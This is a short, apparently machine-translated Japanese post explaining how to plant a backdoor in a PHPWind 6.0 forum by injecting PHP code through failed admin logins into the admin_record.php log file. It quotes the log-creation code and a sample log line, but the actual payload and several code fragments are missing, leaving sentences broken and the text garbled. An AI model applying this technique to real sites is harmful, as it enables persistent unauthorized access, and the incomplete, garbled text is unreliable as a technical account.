pwのバックドア手法の解析

pw にバックドアを置く方法

databbscacheadmin_record.php では、バックグラウンドでのログインと操作を記録します。このファイルの操作方法を見てみましょう:

adminadmincp.php:

$bbsrecordfile= D_P."data/bbscache/admin_record.php";
if(!file_exists($bbsrecordfile)){
writeover($bbsrecordfile,"n"); }//これは、admin_record.php が存在しない場合にコードを使用して生成することを示しています。

admin_record.php を編集して を削除するとどうなるでしょうか :)
admin_record.php に書かれたコードを見てみましょう

バックグラウンドで http://localhost/PHPVind_GBK_6.0RC/upload/admin.php にログインします
何でも使用してくださいlike 間違ったユーザーログインには次のレコードが含まれます:

|admin|s|Logging Failed|127.0.0.1|1191667510|

笑 これでコードを書くことができますが、これは次のとおりです。

そのため、バックドアは の代わりに次のようにする必要があります。